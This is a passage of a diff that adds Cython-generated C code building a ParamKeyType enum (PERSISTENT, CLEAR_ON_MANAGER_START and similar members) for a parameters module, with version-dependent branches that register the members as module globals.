__pyx_unpickle___Pyx_EnumMeta(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + __pyx_t_6 = __Pyx_CyFunction_New(&__pyx_mdef_8EnumBase_1__pyx_unpickle___Pyx_EnumMeta, 0, __pyx_n_s_pyx_unpickle___Pyx_EnumMeta, NULL, __pyx_n_s_EnumBase, __pyx_d, ((PyObject *)__pyx_codeobj__20)); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_pyx_unpickle___Pyx_EnumMeta, __pyx_t_6) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + + /* "EnumType":76 + * object __Pyx_PyInt_From_enum__ParamKeyType(ParamKeyType value) + * + * cdef dict __Pyx_globals = globals() # <<<<<<<<<<<<<< + * if PY_VERSION_HEX >= 0x03060000: + * + */ + __pyx_t_6 = __Pyx_Globals(); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 76, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (!(likely(PyDict_CheckExact(__pyx_t_6))||((__pyx_t_6) == Py_None) || __Pyx_RaiseUnexpectedTypeError("dict", __pyx_t_6))) __PYX_ERR(1, 76, __pyx_L1_error) + __Pyx_XGOTREF(__Pyx_globals); + __Pyx_DECREF_SET(__Pyx_globals, ((PyObject*)__pyx_t_6)); + __Pyx_GIVEREF(__pyx_t_6); + __pyx_t_6 = 0; + + /* "EnumType":77 + * + * cdef dict __Pyx_globals = globals() + * if PY_VERSION_HEX >= 0x03060000: # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_2 = (PY_VERSION_HEX >= 0x03060000); + if (__pyx_t_2) { + + /* "EnumType":81 + * + * ParamKeyType = __Pyx_FlagBase('ParamKeyType', [ + * ('PERSISTENT', __Pyx_PyInt_From_enum__ParamKeyType(PERSISTENT)), # <<<<<<<<<<<<<< + * ('CLEAR_ON_MANAGER_START', __Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_MANAGER_START)), + * ('CLEAR_ON_ONROAD_TRANSITION', __Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_ONROAD_TRANSITION)), + */ + __pyx_t_6 = __Pyx_PyInt_From_enum__ParamKeyType(PERSISTENT); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 81, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 81, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_n_s_PERSISTENT); + __Pyx_GIVEREF(__pyx_n_s_PERSISTENT); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_n_s_PERSISTENT); + __Pyx_GIVEREF(__pyx_t_6); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_6); + __pyx_t_6 = 0; + + /* "EnumType":82 + * ParamKeyType = __Pyx_FlagBase('ParamKeyType', [ + * ('PERSISTENT', __Pyx_PyInt_From_enum__ParamKeyType(PERSISTENT)), + * ('CLEAR_ON_MANAGER_START', __Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_MANAGER_START)), # <<<<<<<<<<<<<< + * ('CLEAR_ON_ONROAD_TRANSITION', __Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_ONROAD_TRANSITION)), + * ('CLEAR_ON_OFFROAD_TRANSITION', __Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_OFFROAD_TRANSITION)), + */ + __pyx_t_6 = __Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_MANAGER_START); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 82, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_4 = PyTuple_New(2); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 82, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_INCREF(__pyx_n_s_CLEAR_ON_MANAGER_START); + __Pyx_GIVEREF(__pyx_n_s_CLEAR_ON_MANAGER_START); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_n_s_CLEAR_ON_MANAGER_START); + __Pyx_GIVEREF(__pyx_t_6); + PyTuple_SET_ITEM(__pyx_t_4, 1, __pyx_t_6); + __pyx_t_6 = 0; + + /* "EnumType":83 + * ('PERSISTENT', __Pyx_PyInt_From_enum__ParamKeyType(PERSISTENT)), + * ('CLEAR_ON_MANAGER_START', __Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_MANAGER_START)), + * ('CLEAR_ON_ONROAD_TRANSITION', __Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_ONROAD_TRANSITION)), # <<<<<<<<<<<<<< + * ('CLEAR_ON_OFFROAD_TRANSITION', __Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_OFFROAD_TRANSITION)), + * ('ALL', __Pyx_PyInt_From_enum__ParamKeyType(ALL)), + */ + __pyx_t_6 = __Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_ONROAD_TRANSITION); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 83, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_5 = PyTuple_New(2); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 83, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_INCREF(__pyx_n_s_CLEAR_ON_ONROAD_TRANSITION); + __Pyx_GIVEREF(__pyx_n_s_CLEAR_ON_ONROAD_TRANSITION); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_n_s_CLEAR_ON_ONROAD_TRANSITION); + __Pyx_GIVEREF(__pyx_t_6); + PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_6); + __pyx_t_6 = 0; + + /* "EnumType":84 + * ('CLEAR_ON_MANAGER_START', __Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_MANAGER_START)), + * ('CLEAR_ON_ONROAD_TRANSITION', __Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_ONROAD_TRANSITION)), + * ('CLEAR_ON_OFFROAD_TRANSITION', __Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_OFFROAD_TRANSITION)), # <<<<<<<<<<<<<< + * ('ALL', __Pyx_PyInt_From_enum__ParamKeyType(ALL)), + * + */ + __pyx_t_6 = __Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_OFFROAD_TRANSITION); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 84, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_7 = PyTuple_New(2); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 84, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_INCREF(__pyx_n_s_CLEAR_ON_OFFROAD_TRANSITION); + __Pyx_GIVEREF(__pyx_n_s_CLEAR_ON_OFFROAD_TRANSITION); + PyTuple_SET_ITEM(__pyx_t_7, 0, __pyx_n_s_CLEAR_ON_OFFROAD_TRANSITION); + __Pyx_GIVEREF(__pyx_t_6); + PyTuple_SET_ITEM(__pyx_t_7, 1, __pyx_t_6); + __pyx_t_6 = 0; + + /* "EnumType":85 + * ('CLEAR_ON_ONROAD_TRANSITION', __Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_ONROAD_TRANSITION)), + * ('CLEAR_ON_OFFROAD_TRANSITION', __Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_OFFROAD_TRANSITION)), + * ('ALL', __Pyx_PyInt_From_enum__ParamKeyType(ALL)), # <<<<<<<<<<<<<< + * + * ], module=__Pyx_globals.get("__module__", 'common.params_pyx')) + */ + __pyx_t_6 = __Pyx_PyInt_From_enum__ParamKeyType(ALL); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 85, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_8 = PyTuple_New(2); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 85, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_INCREF(__pyx_n_s_ALL); + __Pyx_GIVEREF(__pyx_n_s_ALL); + PyTuple_SET_ITEM(__pyx_t_8, 0, __pyx_n_s_ALL); + __Pyx_GIVEREF(__pyx_t_6); + PyTuple_SET_ITEM(__pyx_t_8, 1, __pyx_t_6); + __pyx_t_6 = 0; + + /* "EnumType":80 + * + * + * ParamKeyType = __Pyx_FlagBase('ParamKeyType', [ # <<<<<<<<<<<<<< + * ('PERSISTENT', __Pyx_PyInt_From_enum__ParamKeyType(PERSISTENT)), + * ('CLEAR_ON_MANAGER_START', __Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_MANAGER_START)), + */ + __pyx_t_6 = PyList_New(5); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 80, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_GIVEREF(__pyx_t_3); + PyList_SET_ITEM(__pyx_t_6, 0, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_4); + PyList_SET_ITEM(__pyx_t_6, 1, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_5); + PyList_SET_ITEM(__pyx_t_6, 2, __pyx_t_5); + __Pyx_GIVEREF(__pyx_t_7); + PyList_SET_ITEM(__pyx_t_6, 3, __pyx_t_7); + __Pyx_GIVEREF(__pyx_t_8); + PyList_SET_ITEM(__pyx_t_6, 4, __pyx_t_8); + __pyx_t_3 = 0; + __pyx_t_4 = 0; + __pyx_t_5 = 0; + __pyx_t_7 = 0; + __pyx_t_8 = 0; + __pyx_t_8 = PyTuple_New(2); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 80, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_INCREF(__pyx_n_s_ParamKeyType); + __Pyx_GIVEREF(__pyx_n_s_ParamKeyType); + PyTuple_SET_ITEM(__pyx_t_8, 0, __pyx_n_s_ParamKeyType); + __Pyx_GIVEREF(__pyx_t_6); + PyTuple_SET_ITEM(__pyx_t_8, 1, __pyx_t_6); + __pyx_t_6 = 0; + + /* "EnumType":87 + * ('ALL', __Pyx_PyInt_From_enum__ParamKeyType(ALL)), + * + * ], module=__Pyx_globals.get("__module__", 'common.params_pyx')) # <<<<<<<<<<<<<< + * + * if PY_VERSION_HEX >= 0x030B0000: + */ + __pyx_t_6 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 87, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (unlikely(__Pyx_globals == Py_None)) { + PyErr_Format(PyExc_AttributeError, "'NoneType' object has no attribute '%.30s'", "get"); + __PYX_ERR(1, 87, __pyx_L1_error) + } + __pyx_t_7 = __Pyx_PyDict_GetItemDefault(__Pyx_globals, __pyx_n_s_module, __pyx_n_s_common_params_pyx); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 87, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_t_6, __pyx_n_s_module_2, __pyx_t_7) < 0) __PYX_ERR(1, 87, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "EnumType":80 + * + * + * ParamKeyType = __Pyx_FlagBase('ParamKeyType', [ # <<<<<<<<<<<<<< + * ('PERSISTENT', __Pyx_PyInt_From_enum__ParamKeyType(PERSISTENT)), + * ('CLEAR_ON_MANAGER_START', __Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_MANAGER_START)), + */ + __pyx_t_7 = __Pyx_PyObject_Call(__Pyx_FlagBase, __pyx_t_8, __pyx_t_6); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 80, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + if (PyDict_SetItem(__pyx_d, __pyx_n_s_ParamKeyType, __pyx_t_7) < 0) __PYX_ERR(1, 80, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "EnumType":89 + * ], module=__Pyx_globals.get("__module__", 'common.params_pyx')) + * + * if PY_VERSION_HEX >= 0x030B0000: # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_2 = (PY_VERSION_HEX >= 0x030B0000); + if (__pyx_t_2) { + + /* "EnumType":94 + * + * + * ParamKeyType._member_names_ = list(ParamKeyType.__members__) # <<<<<<<<<<<<<< + * + * __Pyx_globals['PERSISTENT'] = ParamKeyType.PERSISTENT + */ + __Pyx_GetModuleGlobalName(__pyx_t_7, __pyx_n_s_ParamKeyType); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 94, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_6 = __Pyx_PyObject_GetAttrStr(__pyx_t_7, __pyx_n_s_members); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 94, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __pyx_t_7 = __Pyx_PySequence_ListKeepNew(__pyx_t_6); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 94, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_ParamKeyType); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 94, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (__Pyx_PyObject_SetAttrStr(__pyx_t_6, __pyx_n_s_member_names, __pyx_t_7) < 0) __PYX_ERR(1, 94, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + + /* "EnumType":89 + * ], module=__Pyx_globals.get("__module__", 'common.params_pyx')) + * + * if PY_VERSION_HEX >= 0x030B0000: # <<<<<<<<<<<<<< + * + * + */ + } + + /* "EnumType":96 + * ParamKeyType._member_names_ = list(ParamKeyType.__members__) + * + * __Pyx_globals['PERSISTENT'] = ParamKeyType.PERSISTENT # <<<<<<<<<<<<<< + * __Pyx_globals['CLEAR_ON_MANAGER_START'] = ParamKeyType.CLEAR_ON_MANAGER_START + * __Pyx_globals['CLEAR_ON_ONROAD_TRANSITION'] = ParamKeyType.CLEAR_ON_ONROAD_TRANSITION + */ + __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_ParamKeyType); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 96, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_t_6, __pyx_n_s_PERSISTENT); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 96, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + if (unlikely(__Pyx_globals == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 96, __pyx_L1_error) + } + if (unlikely((PyDict_SetItem(__Pyx_globals, __pyx_n_s_PERSISTENT, __pyx_t_7) < 0))) __PYX_ERR(1, 96, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "EnumType":97 + * + * __Pyx_globals['PERSISTENT'] = ParamKeyType.PERSISTENT + * __Pyx_globals['CLEAR_ON_MANAGER_START'] = ParamKeyType.CLEAR_ON_MANAGER_START # <<<<<<<<<<<<<< + * __Pyx_globals['CLEAR_ON_ONROAD_TRANSITION'] = ParamKeyType.CLEAR_ON_ONROAD_TRANSITION + * __Pyx_globals['CLEAR_ON_OFFROAD_TRANSITION'] = ParamKeyType.CLEAR_ON_OFFROAD_TRANSITION + */ + __Pyx_GetModuleGlobalName(__pyx_t_7, __pyx_n_s_ParamKeyType); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 97, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_6 = __Pyx_PyObject_GetAttrStr(__pyx_t_7, __pyx_n_s_CLEAR_ON_MANAGER_START); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 97, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + if (unlikely(__Pyx_globals == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 97, __pyx_L1_error) + } + if (unlikely((PyDict_SetItem(__Pyx_globals, __pyx_n_s_CLEAR_ON_MANAGER_START, __pyx_t_6) < 0))) __PYX_ERR(1, 97, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + + /* "EnumType":98 + * __Pyx_globals['PERSISTENT'] = ParamKeyType.PERSISTENT + * __Pyx_globals['CLEAR_ON_MANAGER_START'] = ParamKeyType.CLEAR_ON_MANAGER_START + * __Pyx_globals['CLEAR_ON_ONROAD_TRANSITION'] = ParamKeyType.CLEAR_ON_ONROAD_TRANSITION # <<<<<<<<<<<<<< + * __Pyx_globals['CLEAR_ON_OFFROAD_TRANSITION'] = ParamKeyType.CLEAR_ON_OFFROAD_TRANSITION + * __Pyx_globals['ALL'] = ParamKeyType.ALL + */ + __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_ParamKeyType); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 98, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_t_6, __pyx_n_s_CLEAR_ON_ONROAD_TRANSITION); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 98, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + if (unlikely(__Pyx_globals == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 98, __pyx_L1_error) + } + if (unlikely((PyDict_SetItem(__Pyx_globals, __pyx_n_s_CLEAR_ON_ONROAD_TRANSITION, __pyx_t_7) < 0))) __PYX_ERR(1, 98, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "EnumType":99 + * __Pyx_globals['CLEAR_ON_MANAGER_START'] = ParamKeyType.CLEAR_ON_MANAGER_START + * __Pyx_globals['CLEAR_ON_ONROAD_TRANSITION'] = ParamKeyType.CLEAR_ON_ONROAD_TRANSITION + * __Pyx_globals['CLEAR_ON_OFFROAD_TRANSITION'] = ParamKeyType.CLEAR_ON_OFFROAD_TRANSITION # <<<<<<<<<<<<<< + * __Pyx_globals['ALL'] = ParamKeyType.ALL + * else: + */ + __Pyx_GetModuleGlobalName(__pyx_t_7, __pyx_n_s_ParamKeyType); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 99, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_6 = __Pyx_PyObject_GetAttrStr(__pyx_t_7, __pyx_n_s_CLEAR_ON_OFFROAD_TRANSITION); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 99, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + if (unlikely(__Pyx_globals == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 99, __pyx_L1_error) + } + if (unlikely((PyDict_SetItem(__Pyx_globals, __pyx_n_s_CLEAR_ON_OFFROAD_TRANSITION, __pyx_t_6) < 0))) __PYX_ERR(1, 99, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + + /* "EnumType":100 + * __Pyx_globals['CLEAR_ON_ONROAD_TRANSITION'] = ParamKeyType.CLEAR_ON_ONROAD_TRANSITION + * __Pyx_globals['CLEAR_ON_OFFROAD_TRANSITION'] = ParamKeyType.CLEAR_ON_OFFROAD_TRANSITION + * __Pyx_globals['ALL'] = ParamKeyType.ALL # <<<<<<<<<<<<<< + * else: + * class ParamKeyType(__Pyx_FlagBase): + */ + __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_ParamKeyType); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 100, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_t_6, __pyx_n_s_ALL); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 100, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + if (unlikely(__Pyx_globals == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 100, __pyx_L1_error) + } + if (unlikely((PyDict_SetItem(__Pyx_globals, __pyx_n_s_ALL, __pyx_t_7) < 0))) __PYX_ERR(1, 100, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "EnumType":77 + * + * cdef dict __Pyx_globals = globals() + * if PY_VERSION_HEX >= 0x03060000: # <<<<<<<<<<<<<< + * + * + */ + goto __pyx_L5; + } + + /* "EnumType":102 + * __Pyx_globals['ALL'] = ParamKeyType.ALL + * else: + * class ParamKeyType(__Pyx_FlagBase): # <<<<<<<<<<<<<< + * pass + * __Pyx_globals['PERSISTENT'] = ParamKeyType(__Pyx_PyInt_From_enum__ParamKeyType(PERSISTENT), 'PERSISTENT') + */ + /*else*/ { + __pyx_t_7 = PyTuple_New(1); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 102, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_INCREF(__Pyx_FlagBase); + __Pyx_GIVEREF(__Pyx_FlagBase); + PyTuple_SET_ITEM(__pyx_t_7, 0, __Pyx_FlagBase); + __pyx_t_6 = __Pyx_PEP560_update_bases(__pyx_t_7); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 102, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_8 = __Pyx_CalculateMetaclass(NULL, __pyx_t_6); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 102, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_5 = __Pyx_Py3MetaclassPrepare(__pyx_t_8, __pyx_t_6, __pyx_n_s_ParamKeyType, __pyx_n_s_ParamKeyType, (PyObject *) NULL, __pyx_n_s_EnumType, (PyObject *) NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 102, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + if (__pyx_t_6 != __pyx_t_7) { + if (unlikely((PyDict_SetItemString(__pyx_t_5, "__orig_bases__", __pyx_t_7) < 0))) __PYX_ERR(1, 102, __pyx_L1_error) + } + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __pyx_t_7 = __Pyx_Py3ClassCreate(__pyx_t_8, __pyx_n_s_ParamKeyType, __pyx_t_6, __pyx_t_5, NULL, 0, 0); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 102, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_ParamKeyType, __pyx_t_7) < 0) __PYX_ERR(1, 102, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + + /* "EnumType":104 + * class ParamKeyType(__Pyx_FlagBase): + * pass + * __Pyx_globals['PERSISTENT'] = ParamKeyType(__Pyx_PyInt_From_enum__ParamKeyType(PERSISTENT), 'PERSISTENT') # <<<<<<<<<<<<<< + * __Pyx_globals['CLEAR_ON_MANAGER_START'] = ParamKeyType(__Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_MANAGER_START), 'CLEAR_ON_MANAGER_START') + * __Pyx_globals['CLEAR_ON_ONROAD_TRANSITION'] = ParamKeyType(__Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_ONROAD_TRANSITION), 'CLEAR_ON_ONROAD_TRANSITION') + */ + __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_ParamKeyType); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 104, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_8 = __Pyx_PyInt_From_enum__ParamKeyType(PERSISTENT); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 104, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_5 = PyTuple_New(2); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 104, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_GIVEREF(__pyx_t_8); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_t_8); + __Pyx_INCREF(__pyx_n_s_PERSISTENT); + __Pyx_GIVEREF(__pyx_n_s_PERSISTENT); + PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_n_s_PERSISTENT); + __pyx_t_8 = 0; + __pyx_t_8 = __Pyx_PyObject_Call(__pyx_t_6, __pyx_t_5, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 104, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(__Pyx_globals == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 104, __pyx_L1_error) + } + if (unlikely((PyDict_SetItem(__Pyx_globals, __pyx_n_s_PERSISTENT, __pyx_t_8) < 0))) __PYX_ERR(1, 104, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + + /* "EnumType":105 + * pass + * __Pyx_globals['PERSISTENT'] = ParamKeyType(__Pyx_PyInt_From_enum__ParamKeyType(PERSISTENT), 'PERSISTENT') + * __Pyx_globals['CLEAR_ON_MANAGER_START'] = ParamKeyType(__Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_MANAGER_START), 'CLEAR_ON_MANAGER_START') # <<<<<<<<<<<<<< + * __Pyx_globals['CLEAR_ON_ONROAD_TRANSITION'] = ParamKeyType(__Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_ONROAD_TRANSITION), 'CLEAR_ON_ONROAD_TRANSITION') + * __Pyx_globals['CLEAR_ON_OFFROAD_TRANSITION'] = ParamKeyType(__Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_OFFROAD_TRANSITION), 'CLEAR_ON_OFFROAD_TRANSITION') + */ + __Pyx_GetModuleGlobalName(__pyx_t_8, __pyx_n_s_ParamKeyType); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 105, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_5 = __Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_MANAGER_START); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 105, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = PyTuple_New(2); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 105, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_GIVEREF(__pyx_t_5); + PyTuple_SET_ITEM(__pyx_t_6, 0, __pyx_t_5); + __Pyx_INCREF(__pyx_n_s_CLEAR_ON_MANAGER_START); + __Pyx_GIVEREF(__pyx_n_s_CLEAR_ON_MANAGER_START); + PyTuple_SET_ITEM(__pyx_t_6, 1, __pyx_n_s_CLEAR_ON_MANAGER_START); + __pyx_t_5 = 0; + __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_8, __pyx_t_6, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 105, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + if (unlikely(__Pyx_globals == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 105, __pyx_L1_error) + } + if (unlikely((PyDict_SetItem(__Pyx_globals, __pyx_n_s_CLEAR_ON_MANAGER_START, __pyx_t_5) < 0))) __PYX_ERR(1, 105, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "EnumType":106 + * __Pyx_globals['PERSISTENT'] = ParamKeyType(__Pyx_PyInt_From_enum__ParamKeyType(PERSISTENT), 'PERSISTENT') + * __Pyx_globals['CLEAR_ON_MANAGER_START'] = ParamKeyType(__Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_MANAGER_START), 'CLEAR_ON_MANAGER_START') + * __Pyx_globals['CLEAR_ON_ONROAD_TRANSITION'] = ParamKeyType(__Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_ONROAD_TRANSITION), 'CLEAR_ON_ONROAD_TRANSITION') # <<<<<<<<<<<<<< + * 